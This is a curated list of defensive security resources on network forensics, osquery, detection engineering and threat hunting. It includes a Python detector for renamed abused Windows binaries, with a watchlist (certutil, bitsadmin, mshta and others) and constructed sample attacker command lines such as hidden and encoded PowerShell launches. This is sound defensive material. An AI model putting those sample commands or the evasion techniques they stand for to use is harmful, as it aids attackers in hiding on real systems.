Pip3line, the Swiss army knife of byte manipulation
-
DNS
-
DNSChef
- DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka "Fake DNS") is a tool used for application network traffic analysis among other uses. For example, a DNS proxy can be used to fake requests for "badguy.com" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.
-
Passive DNS
- A tool to collect DNS records passively to aid Incident handling, Network Security Monitoring (NSM) and general digital forensics. * PassiveDNS sniffs traffic from an interface or reads a pcap-file and outputs the DNS-server answers to a log file. PassiveDNS can cache/aggregate duplicate DNS answers in-memory, limiting the amount of data in the logfile without losing the essense in the DNS answer.
-
DNSChef
-
HTTP Traffic
-
Captipper
- CapTipper is a python tool to analyze, explore and revive HTTP malicious traffic. CapTipper sets up a web server that acts exactly as the server in the PCAP file, and contains internal tools, with a powerful interactive console, for analysis and inspection of the hosts, objects and conversations found.
-
PCAPs/Packet Capture
-
CapLoader
- CapLoader is a Windows tool designed to handle large amounts of captured network traffic. CapLoader performs indexing of PCAP/PcapNG files and visualizes their contents as a list of TCP and UDP flows. Users can select the flows of interest and quickly filter out those packets from the loaded PCAP files. Sending the selected flows/packets to a packet analyzer tool like Wireshark or NetworkMiner is then just a mouse click away.
-
Netdude
- The Network Dump data Displayer and Editor is a framework for inspection, analysis and manipulation of tcpdump trace files. It addresses the need for a toolset that allows easy inspection, modification, and creation of pcap/tcpdump trace files. Netdude builds on any popular UNIX-like OS, such as Linux, the BSDs, or OSX.
-
Stenographer
- Stenographer is a full-packet-capture utility for buffering packets to disk for intrusion detection and incident response purposes. It provides a high-performance implementation of NIC-to-disk packet writing, handles deleting those files as disk fills up, and provides methods for reading back specific sets of packets quickly and easily.
-
PCAPDB
- PcapDB is a distributed, search-optimized open source packet capture system. It was designed to replace expensive, commercial appliances with off-the-shelf hardware and a free, easy to manage software system. Captured packets are reorganized during capture by flow (an indefinite length sequence of packets with the same src/dst ips/ports and transport proto), indexed by flow, and searched (again) by flow. The indexes for the captured packets are relatively tiny (typically less than 1% the size of the captured data).
-
Network Miner
- NetworkMiner is a Network Forensic Analysis Tool (NFAT) for Windows (but also works in Linux / Mac OS X / FreeBSD). NetworkMiner can be used as a passive network sniffer/packet capturing tool in order to detect operating systems, sessions, hostnames, open ports etc. without putting any traffic on the network. NetworkMiner can also parse PCAP files for off-line analysis and to regenerate/reassemble transmitted files and certificates from PCAP files.
-
SiLK
-
SiLK
- The SiLK analysis suite is a collection of command-line tools for processing SiLK Flow records created by the SiLK packing system. These tools read binary files containing SiLK Flow records and partition, sort, and count these records. The most important analysis tool is rwfilter, an application for querying the central data repository for SiLK Flow records that satisfy a set of filtering options. The tools are intended to be combined in various ways to perform an analysis task. A typical analysis uses UNIX pipes and intermediate data files to share data between invocations of the tools.
- Administering/Installing SiLK
- SiLK Tool Tips
- SiLK Reference Guide
- SiLK Toolsuite Quick Reference Guide
-
flowbat
- Awesome flow tool, SiLK backend
-
ShellCode Analysis
-
Shellcode Analysis Pipeline
- I recently required an automated way of analyzing shellcode and verifying if it is detected by Libemu, Snort, Suricata, Bro, etc. Shellcode had to come from public sources like Shell-Storm, Exploit-DB and Metasploit. I needed an automated way of sourcing shellcode from these projects and passing it on to the analysis engines in a pipeline-like mechanism. This post documents the method I used to complete this task and the overall progress of the project.
-
OSQuery
-
101
-
osquery
- osquery is a SQL powered operating system instrumentation, monitoring, and analytics framework. Available for Linux, macOS, Windows, and FreeBSD.
- Table Schema v4.3
- Getting Started Documentation
- Optimizing Queries in OSQuery - Dennis Griffin(2018)
-
Articles/Blogposts/Writeups
- osquery Across the Enterprise - Chris L(Palantir 2017)
- Palantir osquery Configuration - The goal of this project is to provide a baseline template for any organization considering a deployment of osquery in a production environment.
- Blue Team Diary, Entry #1: Leveraging Osquery For Enhanced Incident Response & Threat Hunting - Dimitrios Bougioukas(2019)
-
Talks/Presentations/Videos
-
Leveraging Osquery For Enhanced Incident Response & Threat Hunting - Dimitrios Bougioukas(2019)
- This video accompanies eLearnSecurity's Blue Team Diary, Entry #1: Leveraging Osquery For Enhanced Incident Response & Threat Hunting post on medium.
-
Osquery across compliance, monitoring, risk and threat hunting - Hugh Neale(QueryCon2019)
- Stories, use cases and lessons learnt from the front line: Hugh will demonstrate how powerful osquery is across compliance, monitoring, risk, IAM and threat hunting. The goal is to help build a complete picture of your IT estate and security posture. This talk is aimed at IT and Security operations. Zercurity has been using osquery in production workloads from startups to listed companies. They use osquery for inventory management, monitoring, compliance, risk, vulnerability management and IAM, to name a few. Hugh will share some of their takeaways over the last few years and tell you about some of the things you can build atop osquery.
- Slides
-
Monitoring Ephemeral Infrastructure with osquery - Matt Jane(QueryCon2019)
- Modern infrastructure and deployment methods, as well as web-scale infrastructure, have brought about a new paradigm in infrastructure management. Short-lived and ephemeral resources allow applications to scale up and down on demand. Unfortunately this means that one of the primary information gathering methods of osquery, scheduled queries, becomes far less useful if queries are scheduled for a longer interval than the infrastructure will exist. This doesn’t mean osquery and scheduled queries are no longer useful, far from it. It simply means that we need to adjust our way of thinking a bit and adapt our methods of information gathering to overcome these new issues.
- Slides
-
Linux security event monitoring with osquery - Alessandro Gario(Querycon2019)
- This talk introduces security event monitoring on Linux, and our lessons learned from attempts to implement it within osquery. Our first experience with osquery event monitoring was rewriting its use of Auditd. In order to capture events within containers, we next implemented an event publisher based on eBPF. We discovered what works, what doesn’t, and some paths forward.
-
How osquery uses sqlite3 and rocksdb - Alex Malone(Querycon2019)
- We will walk through a query from SQL to the logged JSON results, noting the important interactions with sqlite3 and rocksdb. For example, the processes table specifies an INDEX on pid. What does that entail, and how does it impact how the table generate() function is called? In this talk, listeners will gain insight into the sqlite3 virtual table API.
-
Tooling
- Fleet Managers
-
Fleet
- Fleet is the most widely used open-source osquery Fleet manager. Deploying osquery with Fleet enables live queries, and effective management of osquery infrastructure.
-
Doorman
- Doorman is an osquery fleet manager that allows administrators to remotely manage the osquery configurations retrieved by nodes. Administrators can dynamically configure the set of packs, queries, and/or file integrity monitoring target paths using tags. Doorman takes advantage of osquery's TLS configuration, logger, and distributed read/write endpoints, to give administrators visibility across a fleet of devices with minimal overhead and intrusiveness.
- Plugins/Extensions
-
osquery-go
- This project contains Go bindings for creating osquery extensions in Go.
-
osquery-python
- This project contains the official Python bindings for creating osquery extensions in Python.
-
brosquery
- This project builds an OSQuery module libbro.so for loading bro logs as tables in osquery.
-
osquery extensions by Trail of Bits
- This repository includes osquery extensions developed and maintained by Trail of Bits.
-
Linux
- 101
- Articles/Writeups
- Understanding
- Tools
-
macOS/OS X
- 101
- Articles/Writeups
- Understanding
-
Tools
-
Crescendo
- Crescendo is a Swift-based, real-time event viewer for macOS. It utilizes Apple's Endpoint Security Framework.
- Blogpost
- Learn How to Build Your Own Utility to Monitor Malicious Behaviors of Malware on macOS - Kai Lu(BH USA 2018)
-
File System/Files/Folders
- Articles/Blogposts/Writeups
-
Tooling
- filemon - An FSEvents client - http://newosxbook.com/tools/filemon.html
-
filewatcher(2018)
- Filewatcher is an auditing and monitoring utility for macOS. It can audit all events from the system auditpipe of macOS and filter them by process or by file.
-
FileMonitor
- A macOS File Monitor (based on Apple's new Endpoint Security Framework)
-
Processes
- Articles/Blogposts/Writeups
-
Tooling
-
Process Monitor
- Process Monitor Library (based on Apple's new Endpoint Security Framework)
-
ProcInfo
- ProcInfo is an open-source, user-mode library for macOS. It provides a simple interface to retrieve detailed information about running processes, and allows one to asynchronously monitor process creation & exit events.
-
Windows
- Articles/Writeups
- Talks/Presentations/Videos
- Understanding
- Tools
-
Audit Policy
-
101
-
Advanced security audit policy settings - docs.ms
- This reference for IT professionals provides information about the advanced audit policy settings that are available in Windows and the audit events that they generate. The security audit policy settings under Security Settings\Advanced Audit Policy Configuration can help your organization audit compliance with important business-related and security-related rules by tracking precisely defined activities.
-
Files/Folders
-
Real-time file monitoring on Windows with osquery - trailofbits
- Trail of Bits has developed ntfs_journal_events, a new event-based osquery table for Windows that enables real-time file change monitoring.
- Processes
- Sysmon
Detection Engineering
-
101
-
Articles/Writeups
- Methods of Detection - Jack Crook
- What’s in a name? TTPs in Info Sec - Robby Winchester(2017)
-
Capability Abstraction - Jared Atkinson
- This is the first of a multipart blog series by the SpecterOps detection team. The goal of this series is to introduce and discuss foundational detection engineering concepts. To make these concepts as consumable as possible, we are focusing the entire series around Kerberoasting. Focusing on this technique allows readers to focus on the strategies presented in each article instead of worrying about the details of the technique itself. The focus of this post is a concept we call “capability abstraction.” The idea is that an attacker’s tools are merely an abstraction of their attack capabilities, and detection engineers must understand how to evaluate abstraction while building detection logic.
-
Uncovering The Unknowns - Jonathan Johnson(2019)
- Mapping Windows API’s to Sysmon Events
- Getting Started with ATT&CK: Detection and Analytics - John Wunder(2019)
- The Detection Maturity Level Model - Ryan Stillion(2014)
-
Talks & Presentations
-
$SignaturesAreDead = “Long Live RESILIENT Signatures” wide ascii nocase - Matthew Dunwoody, Daniel Bohannon(BruCON 0x0A)
- Signatures are dead, or so we're told. It's true that many items that are shared as Indicators of Compromise (file names/paths/sizes/hashes and network IPs/domains) are no longer effective. These rigid indicators break at the first attempt at evasion. Creating resilient detections that stand up to evasion attempts by dedicated attackers and researchers is challenging, but is possible with the right tools, visibility and methodical (read iterative) approach. As part of FireEye's Advanced Practices Team, we are tasked with creating resilient, high-fidelity detections that run across hundreds of environments and millions of endpoints. In this talk we will share insights on our processes and approaches to detection development, including practical examples derived from real-world attacks.
-
Articles/Writeups
- Linux
- macOS
-
Windows
-
Articles/Writeups
- Engineering Process Injection Detections - Part 1: Research - Jonathan Johnson(2020)
- [Execution - Powershell (T1086) - Rafael Bono, José Miguel Colmena](https://ackcent.com/blog/execution-powershell-t1086/)
- Detection Engineering with Kerberoasting Series
- Host-based Threat Modeling & Indicator Design - Jared Atkinson(2017)
- Thoughts on Host-based Detection Techniques - Jared Atkinson(2017)
-
Black Hat: Detecting the unknown and disclosing a new attack technique at Black Hat 2019 - Brian Donohue
- Researchers Casey Smith and Ross Wolf demonstrated how to threat hunt for the unknown—and disclosed a new attack technique in the process—at the Black Hat security conference in Las Vegas, Nevada Thursday afternoon.
-
Talks & Presentations
-
“How do I detect technique X in Windows?” Applied Methodology to Definitively Answer this Question - Matt Graeber(Derbycon 2019)
- Traditionally, the answer to this question has been to execute an attack technique in a controlled environment and to observe relevant events that surface. While this approach may suffice in some cases, ask yourself the following questions: “Will this scale? Will this detect current/future variants of the technique? Is this resilient to bypass?” If your confidence level in answering these questions is not high, it’s time to consider a more mature methodology for identifying detection data sources. With a little bit of reverse engineering, a defender can unlock a multitude of otherwise unknown telemetry. This talk will establish a methodology for identifying detection data sources and will cover concepts including Event Tracing for Windows, WPP, TraceLogging, and security product analysis.
-
Tools/Tooling
- [API-To-Event](https://github.com/hunters-forge/API-To-Event)
- A repo focused primarily on documenting the relationships between API functions and security events that get generated when using such functions.
Threat Hunting
-
Articles/Writeups
- The Origin of Threat Hunting - TaoSecurity
- The Cyber Hunting Maturity Model - Sqrrl(2015)
- The ThreatHunting Project Annotated Reading List
- Incident Response is Dead… Long Live Incident Response - Scott J Roberts(2015)
-
Demystifying Threat Hunting Concepts - Josh Liburdi(2017)
- This post is about demystifying threat hunting concepts that seem to trip up practitioners and outsiders.
- A Simple Hunting Maturity Model - detect-respond.blogspot (2015)
- The Threat Hunting Reference Model Part 2: The Hunting Loop - Sqrrl
- The Who, What, Where, When, Why and How of Effective Threat Hunting - Robert Lee, Rob Lee(2016)
- Building Threat Hunting Strategies with the Diamond Model - Sergio Caltagirone(2016)
- Cyber Threat Hunting (1): Intro - Samuel Alonso(2016)
- Cyber Hunting: 5 Tips To Bag Your Prey - David J. Bianco
- Data Science Hunting Funnel - Austin Taylor(2017)
- DeTT&CT: Mapping your Blue Team to MITRE ATT&CK™ - Marcus Bakker
- The Role of Evidence Intention - Chris Sanders
- Threat Hunting - Getting Closer to Anomalous Behavior - findingbad.blogspot
-
On TTPs - Ryan Stillions
- [...] I set off a few months ago on a personal quest. I wanted to see if I could locate any official citations that attempted to clearly define, compare or contrast "TTPs" in a cyber context, and show how they could be used both individually and jointly with other models to further advance our work in the context of things above and beyond atomic Indicators of Compromise (IOCs). In this blog post I'll share with you what I found regarding the definitions of "TTPs", and then transition into how I believe they apply to incident detection and response.
- The PARIS Model
- Resources
-
Talks & Presentations
- Threat Hunting Workshop - Methodologies for Threat Analysis - RiskIQ
-
Find_Evil - Threat Hunting - Anurag Khanna(SANS2020)
- Today, organizations are constantly under attack. While security teams are getting good at monitoring and incident response, the frontier to conquer is proactively looking for evil in the environment. Threat hunting is one of the ways in which organizations can proactively look for threats. This talk will discuss the fundamentals of threat hunting, what hunting teams should look for, and how to collect and analyze relevant data. We will discuss some of the recipes to perform threat hunting.
-
Papers
-
Generating Hypotheses for Successful Threat Hunting - Robert M. Lee, David Bianco
- Threat hunting is a proactive and iterative approach to detecting threats. Although threat hunters should rely heavily on automation and machine assistance, the process itself cannot be fully automated. One of the human’s key contributions to a hunt is the formulation of hypotheses to guide the hunt. This paper explores three types of hypotheses and outlines how and when to formulate each of them.
- Hunt Evil: Your Practical Guide to Threat Hunting - threathunting.net
- Huntpedia - Sqrrl
- Threat Hunting: Open Season on the Adversary - Eric Cole(2016)
- Mental Models for Effective Searching - Chris Sanders
-
Articles/Blogposts/Writeups
-
An In-Depth Look Into Data Stacking - M-Labs
- Data stacking is the application of frequency analysis to large volumes of similar data in an effort to isolate and identify anomalies. In short, data stacking is an investigative technique that can be used to find a needle in a digital haystack. It involves an iterative process of reducing large amounts of data into manageable chunks that can be consumed and investigated.
-
Labs
- HELK
-
HELK - The Hunting ELK
- A Hunting ELK (Elasticsearch, Logstash, Kibana) with advanced analytic capabilities.
-
The Quieter You Become, the More You’re Able to (H)ELK - Nate Guagenti, Roberto Rodriguez - BSides Columbus Ohio 2018
- Enabling the correct endpoint logging and centralizing the collection of different data sources has finally become a basic security standard. This allows organizations not just to increase their level of visibility, but to enhance their threat detection. Solutions such as an (Elastic) ELK stack have largely been adopted by small and large organizations for data ingestion, storage and visualization. Although it might seem that collecting a massive amount of data is all analysts need to do their jobs, there are several challenges for them when faced with large, unstructured and often incomplete/disparate data sets. In addition to the Sisyphean task of detecting and responding to adversaries, there may be pitfalls with organizational funding, support, and/or approval (Government). Although “everyone” is collecting logs, and despite the many challenges, we will show you how to make sense of these logs in an efficient and consistent way, specifically when it comes to Windows Event logs (i.e. Sysmon, PowerShell, etc.) and the ability to map fields to other logs such as Bro NSM or some other network monitoring/prevention device. This will include different Windows Event log data normalization techniques across the 1,000+ unique Event IDs and their 3,000+ unique fields, as well as proven data normalization techniques such as hashing fields/values for logs such as PowerShell, Scheduled Tasks, Command Line, and more. These implementations will show how they allow an analyst to efficiently “pivot” from an endpoint log to an NSM log or a device configuration change log. We will also show how an analyst can make an informed decision without degrading/hindering their investigation, and how to enhance that decision, whether this is preventing an analyst from excluding keywords that a malicious actor may include as an “evasion” technique or adding additional analysis techniques (i.e. graphing).
-
EQL
- 101
- Articles/Blogposts/Writeups
- Talks/Presentations/Videos
-
Tooling
-
EQL Analytics Library
- The Event Query Language Analytics Library (eqllib) is a library of event based analytics, written in EQL to detect adversary behaviors identified in MITRE ATT&CK™.
-
Varna
- Varna is an AWS serverless cloud security tool that parses and alerts on CloudTrail logs using Event Query Language (EQL). Varna is deployed as a lambda function, for scanning and serving web requests, and a dynamodb table, for keeping track of seen alerts. Varna is cheap & efficient to run, costing less than 15 dollars a month with proper configuration and ingesting alerts as soon as CloudTrail stores them in S3.
-
Hunt Experiences/Demonstrations of
- Articles/Blogposts/Writeups
-
Talks/Presentations/Papers
- License to Kill: Malware Hunting with the Sysinternals Tools
-
Advanced Attack Detection - William Burgess, Matt Watkins(Securi-Tay2017)
- In this talk, we’ll explain some of the technical concepts of threat hunting. We will be looking at what is beyond traditional signature detection – the likes of AV, IPS/IDS and SIEMs, which in our experience are ineffective – and detailing some of the ways you can catch real attackers in the act. As a case study, we’ll look at some of the specifics of common attack frameworks - the likes of Metasploit and Powershell Empire - walking through an example attack, and showing how they can be detected. From large-scale process monitoring to live memory analysis and anomaly detection techniques, we will cover some of the technical quirks when it comes to effective attack detection.
-
- 101
- Articles/Blogposts/Writeups
-
Tooling
-
memhunter
- Memhunter is an endpoint sensor tool specialized in detecting resident malware, improving the threat hunter's analysis process and remediation times. The tool detects and reports memory-resident malware living in endpoint processes. Memhunter detects known malicious memory injection techniques. The detection process is performed through live analysis, without needing memory dumps. The tool was designed as a replacement for memory forensic Volatility plugins such as malfind and hollowfind. Not requiring memory dumps helps with performing memory-resident malware threat hunting at scale, without manual analysis and without the complex infrastructure needed to move dumps to forensic environments. Besides the data collection and hunting heuristics, the project has also led to the creation of a companion tool called "minjector" that contains 15+ code injection techniques. The minjector tool can be used not only to exercise memhunter detections, but also as a one-stop location to learn about well-known code injection techniques.
-
- 101
-
Articles/Writeups
-
The ThreatHunting Project
- An informational repo about hunting for adversaries in your IT environment.
-
Outbound RDP Surprises - Justin Vaicaro
- The goal of this blog post is not to dissect the threat hunting process or dive into the various hunting strategies and tactics. Rather, the intent is to show the importance of focusing on a legitimate protocol within a threat hunt engagement that can be easily used for potential data exfiltration, hide in plain sight with other normal traffic, and go unnoticed by a security operations center (SOC) that is untrained to identify potentially suspicious network behavior.
- Talks & Presentations
-
Tools
-
grapl
- Grapl is a Graph Platform for Detection and Response with a focus on helping Detection Engineers and Incident Responders stop fighting their data and start connecting it. Grapl leverages graph data structures at its core to ensure that you can query and connect your data efficiently, model complex attacker behaviors for detection, and easily expand suspicious behaviors to encompass the full scope of an ongoing intrusion.
-
- 101
- Articles/Writeups
-
Talks & Presentations
-
Tales from the Network Threat Hunting Trenches - BHIS
- In this webcast John walks through a couple of cool things we’ve found useful in some recent network hunt teams. He also shares some of our techniques and tools (like RITA) that we use all the time to work through massive amounts of data. There are lots of awesome websites that can greatly increase the effectiveness of your in network threat hunting.
-
Network gravity: Exploring an enterprise network - Casey Martin(BSides Tampa2020)
- Enterprise networks are often complex, hard to understand, and worst of all - undocumented. Few organizations have network diagrams and asset management systems and even fewer organizations have those that are effective and up to date. Leveraging an organization's SIEM or logging solution, network diagrams and asset inventories can be extrapolated from this data through the 'gravity' of the network. Similar to our solar system and galaxy, even if you cannot confirm or physically see an object, you can measure the forces of gravity it exerts on the observable objects around it that we do know about. For example, unconfirmed endpoints can be enumerated by the authentication activity they register on known domain controllers. The inferred list of endpoints and their network addresses can begin to map out logical networks. The unpolished list of logical networks can be mapped against known egress points to identify physical networks and potentially identify undiscovered egress points and the technologies that exist at the egress points. As more objects are extrapolated and inferred, the more accurate the model of your enterprise network will become. Through this iterative and repeatable process, network diagrams and asset inventories can be drafted, further explored, refined, and ultimately managed. Even the weakest of observable forces can create fingerprints that security professionals can leverage to more effectively become guardians of the galaxy.
-
Papers
-
Under the Shadow of Sunshine: Understanding and Detecting Bulletproof Hosting on Legitimate Service Provider Networks - Sumayah Alrwais, Xiaojing Liao, Xianghang Mi, Peng Wang, XiaoFeng Wang, Feng Qian, Raheem Beyah, Damon McCoy
- In this paper, we present the first systematic study on this new trend of BPH services. By collecting and analyzing a large amount of data (25 Whois snapshots of the entire IPv4 address space, 1.5 TB of passive DNS data, and longitudinal data from several blacklist feeds), we are able to identify a set of new features that uniquely characterizes BPH on sub-allocations and are costly to evade. Based upon these features, we train a classifier for detecting malicious sub-allocated network blocks, achieving a 98% recall and 1.5% false discovery rates according to our evaluation. Using a conservatively trained version of our classifier, we scan the whole IPv4 address space and detect 39K malicious network blocks. This allows us to perform a large-scale study of the BPH service ecosystem, which sheds light on this underground business strategy, including patterns of network blocks being recycled and malicious clients migrating to different network blocks, in an effort to evade IP address based blacklisting. Our study highlights the trend of agile BPH services and points to potential methods of detecting and mitigating this emerging threat.
-
Tools
-
Imaginary C2
- A Python tool which aims to help in the behavioral (network) analysis of malware. Imaginary C2 hosts an HTTP server which captures HTTP requests towards selectively chosen domains/IPs. Additionally, the tool aims to make it easy to replay captured Command-and-Control responses/served payloads.
- DNS
-
Behavioral Analysis using DNS, Network Traffic and Logs, Josh Pyorre (@joshpyorre)
- Multiple methods exist for detecting malicious activity in a network, including intrusion detection, anti-virus, and log analysis. However, the majority of these use signatures, looking for already known events, and they typically require some level of human intervention and maintenance. Using behavioral analysis methods, it may be possible to observe and create a baseline of average behavior on a network, enabling intelligent notification of anomalous activity. This talk will demonstrate methods of performing this activity in different environments. Attendees will learn new methods which they can apply to further monitor and secure their networks.
- DNS
- SMB
-
TLS
- TLS client fingerprinting with Bro
-
JA3 - A method for profiling SSL/TLS Clients
- JA3 is a method for creating SSL/TLS client fingerprints that are easy to produce and can be easily shared for threat intelligence.
-
Talk/Presentation
- In this talk we will show the benefits of SSL fingerprinting, JA3’s capabilities, and how best to utilize it in your detection and response operations. We will show how to utilize JA3 to find and detect SSL malware on your network. Imagine detecting every Meterpreter shell, regardless of C2 and without the need for SSL interception. We will also announce JA3S, JA3 for SSL server fingerprinting. Imagine detecting every Metasploit Multi Handler or [REDACTED] C2s on AWS. Then we’ll tie it all together, making you armed to the teeth for detecting all things SSL.
-
Tools
-
RITA - Real Intelligence Threat Analytics
- RITA is an open source network traffic analysis framework.
- RITA - Finding Bad Things on Your Network Using Free and Open Source Tools
-
General
-
DNSpop
- Tools to find popular trends by analysis of DNS data. For more information, see my blog post on the most popular subdomains on the internet. Hit the results directory to get straight to the data.
-
Yeti
- Yeti is a platform meant to organize observables, indicators of compromise, TTPs, and knowledge on threats in a single, unified repository. Yeti will also automatically enrich observables (e.g. resolve domains, geolocate IPs) so that you don't have to. Yeti provides an interface for humans (shiny Bootstrap-based UI) and one for machines (web API) so that your other tools can talk nicely to it.
-
Malcom - Malware Communication Analyzer
- Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic, and cross-reference them with known malware sources. This comes in handy when analyzing how certain malware species try to communicate with the outside world.
-
BeaconBits
- Beacon Bits comprises analytical scripts combined with a custom database that evaluate flow traffic for statistical uniformity over a given period of time. The tool relies on one of the most common characteristics of infected hosts: persistent connection attempts to a remote host or set of hosts over a TCP network connection. It is also useful for identifying automation, i.e. host behavior that is not driven by humans.
-
- 101
-
Articles/Writeups
-
Mac system extensions for threat detection: Part 1 - Will Yu
- Part 2
- Part 3
- In part 1 of this series, we’ll go over some of the frameworks accessible by kernel extensions that provide information about file system, process, and network events. These frameworks include the Mandatory Access Control Framework, the KAuth framework, and the IP/socket filter frameworks. We won't do a deep dive into each one of these frameworks specifically, as there have been many other posts and guides regarding how to use these frameworks. Instead, we’ll recap and review each of these frameworks, then in part 2 we’ll cover some valuable tips and tricks we can use inside the kernel extensions framework that will no longer be available in the new SystemExtensions framework starting in macOS 10.15. And finally, in part 3 of the series, we’ll cover the new SystemExtensions framework and the features it provides to third-party developers.
- Hunting for Bad Apples – Part 1 - Richie Cyrus
- Logs Unite! Forensic Analysis Of Apple Unified Logs - Sarah Edwards(2017)
-
Mac system extensions for threat detection: Part 1 - Will Yu
Talks & Presentations
When Macs Come Under ATT&CK - Richie Cyrus(OBTSv1.0)
- This talk will discuss common tactics, techniques and procedures used by attackers on macOS systems, as well as methods to detect adversary activity. We will take a look at known malware, mapping the techniques utilized to the MITRE ATT&CK framework. Attendees will leave equipped to begin hunting for evil lurking within their macOS fleet.
- When Macs Come Under ATT&CK - Richie Cyrus(Derbycon2018)
Tools
Venator
- Venator is a Python tool used to gather data for proactive detection of malicious activity on macOS devices.
- Blogpost - Richie Cyrus(2019)
- Cleaning the Apple Orchard Using Venator to Detect macOS Compromise - Richie Cyrus(BSides Charm 2019)
- Various solutions exist to detect malicious activity on macOS. However, they are not intended for enterprise use or involve installation of an agent. This session will introduce and demonstrate how to detect malicious macOS activity using the tool Venator. Venator is a Python-based macOS tool designed to provide defenders with the data to proactively identify malicious macOS activity at scale.
TrueTree
- TrueTree is more than just a pstree command for macOS. It is used to display a process tree for currently running processes while using a hierarchy built on additional pids that can be collected from the operating system. The standard process tree that can be built with traditional pids and ppids is less than helpful on macOS due to all the XPC communication at play: the vast majority of processes end up having launchd as their parent process. TrueTree instead displays a process tree that is meant to be useful to incident responders, threat hunters, researchers, and everyone in between.
- Blogpost
General
Articles/Writeups
- Part 1: Intro to Threat Hunting with Powershell Empire, Windows event logs, and Graylog - Spartan2194(2017)
- Spotting the Adversary with Windows Event Log Monitoring - NSA
- Windows Event ID 4649 "A replay attack was detected" — Oh really? Are we under ATTACK? Should we do Incident Response? - Iveco Aliza(2020)
- Sysmon Threat Analysis Guide - Andy Green(2020)
Blue Team Hacks - Binary Rename
- "In this post I thought I would share an interesting proof of concept I developed to detect Binary Rename of commonly abused binaries. I'm going to describe the detection, its limitations and share the code."
Binary Rename 2
- In this post I am focusing on static detection, that is, assessing files on disk. I am going to describe the differences between both Yara- and PowerShell-based detections, then share the code.
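A dynamic counterpart to the binary-rename detection described in the two posts above, as an added example that is not the author's code: it compares the on-disk image name in a Sysmon Event ID 1 (process creation) record with the OriginalFileName field that Sysmon (v8.0 and later) copies out of the PE version resource, and alerts when a watched binary is running under a different name. The watchlist, the event-dictionary layout and the sample events are assumptions constructed for this example.

```python
"""Detect renamed copies of commonly abused Windows binaries from Sysmon EID 1.

Added example, not the code from the "Blue Team Hacks - Binary Rename" posts.
Assumes Sysmon events already parsed into dicts with the Image,
OriginalFileName and CommandLine fields; SAMPLE_EVENTS are constructed.
"""
import ntpath

# Lower-cased OriginalFileName values of binaries that are often renamed to dodge
# name-based detections. Assumed watchlist; extend from your own LOLBin list.
WATCHLIST = {
    "powershell.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe",
    "certutil.exe", "wscript.exe", "cscript.exe", "msiexec.exe", "bitsadmin.exe",
}

SAMPLE_EVENTS = [  # constructed Sysmon EID 1 records
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "powershell.exe -nop -w hidden"},
    {"Image": r"C:\Users\bob\AppData\Local\Temp\svchost.exe",
     "OriginalFileName": "PowerShell.EXE", "CommandLine": "svchost.exe -enc SQBFAFgA"},
    {"Image": r"C:\ProgramData\update.exe",
     "OriginalFileName": "RUNDLL32.EXE", "CommandLine": "update.exe payload.dll,Start"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "CommandLine": "notepad.exe notes.txt"},
    {"Image": r"C:\Tools\unsigned.exe", "OriginalFileName": "?", "CommandLine": "unsigned.exe"},
]


def is_renamed(event):
    """True when a watched binary's on-disk name differs from its OriginalFileName."""
    original = event.get("OriginalFileName", "").strip().lower()
    if original in ("", "?", "-"):
        return False          # no version resource: nothing to compare against
    if original not in WATCHLIST:
        return False
    on_disk = ntpath.basename(event["Image"]).lower()
    return on_disk != original


def hunt_renamed_binaries(events):
    """Return one alert per EID 1 event that looks like a renamed LOLBin."""
    alerts = []
    for ev in events:
        if is_renamed(ev):
            alerts.append({"image": ev["Image"], "really": ev["OriginalFileName"],
                           "cmdline": ev.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for alert in hunt_renamed_binaries(SAMPLE_EVENTS):
        print(f"{alert['really']} running as {alert['image']}: {alert['cmdline']}")
```

OriginalFileName comes from a resource the attacker controls, so a modified copy with the version info stripped or edited will show up as "?" or under a benign name and slip past this check; that is the limitation the post refers to, and the reason to pair this with the hash and signer fields of the same event (and the on-disk Yara pass from part 2).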
Papers
Detecting Security Incidents Using Windows Workstation Event Logs - Russ Anthony(2013)
- Windows event logs can be an extremely valuable resource to detect security incidents. While many companies collect logs from security devices and critical servers to comply with regulatory requirements, few collect them from their Windows workstations; even fewer proactively analyze these logs. Collecting and analyzing workstation logs is critical because it is increasingly at the workstation level where the initial compromise is happening. If we are to get better at detecting these initial compromises then it is imperative that we develop an efficient, common sense approach to collecting and analyzing these events.
Windows Logon Forensics - Sunil Gupta(2013)
- A compromised Windows system's forensic analysis may not yield much relevant information about the actual target. The Microsoft Windows operating system uses a variety of logon and authentication mechanisms to connect to remote systems over the network. Incident response and forensic analysis outcomes are prone to errors without a proper understanding of the different account types, Windows logon types and authentication methods available on a Windows platform. This paper walks through logon and authentication and how they are audited for the various Windows account types' logons, for a successful investigation. In the process it describes common authentication protocols such as Kerberos and NTLM to better understand the logon process communications in the Windows environment.
- Detecting Advanced Threats With Sysmon, WEF, and ElasticSearch - Josh Lewis(2015)
Talks & Presentations
Active Directory
101
Monitoring Active Directory for Signs of Compromise - docs.ms
- Applies To: Windows Server 2016, Windows Server 2012 R2, Windows Server 2012
Appendix L: Events to Monitor - docs.ms
- The following table lists events that you should monitor in your environment, according to the recommendations provided in Monitoring Active Directory for Signs of Compromise.
Articles/Writeups
Talks/Presentations/Videos
Detecting the Elusive Active Directory Threat Hunting - Sean Metcalf(BSidesCharm2017)
- Attacks are rarely detected even after months of activity. What are defenders missing and how could an attack be detected? This talk covers effective methods to detect attacker activity using the features built into Windows and how to optimize a detection strategy. The primary focus is on what knobs can be turned and what buttons can be pushed to better detect attacks. One of the latest tools in the offensive toolkit is "Kerberoast", which involves cracking service account passwords offline without admin rights. This attack technique is covered at length, including the latest methods to extract and crack the passwords. Furthermore, this talk describes a new detection method the presenter developed. The attacker's playbook evolves quickly; defenders need to stay up to speed on the latest attack methods and ways to detect them. This presentation will help you better understand what events really matter and how to better leverage Windows features to track, limit, and detect attacks.
- Slides
Tools
WatchAD
- After collecting event logs and Kerberos traffic on all domain controllers, WatchAD can detect a variety of known or unknown threats through feature matching, Kerberos protocol analysis, historical behaviors, sensitive operations, honeypot accounts and so on. The WatchAD rules cover many common AD attacks.
Azure
- Articles/Writeups
Browser Extensions
Articles/Writeups
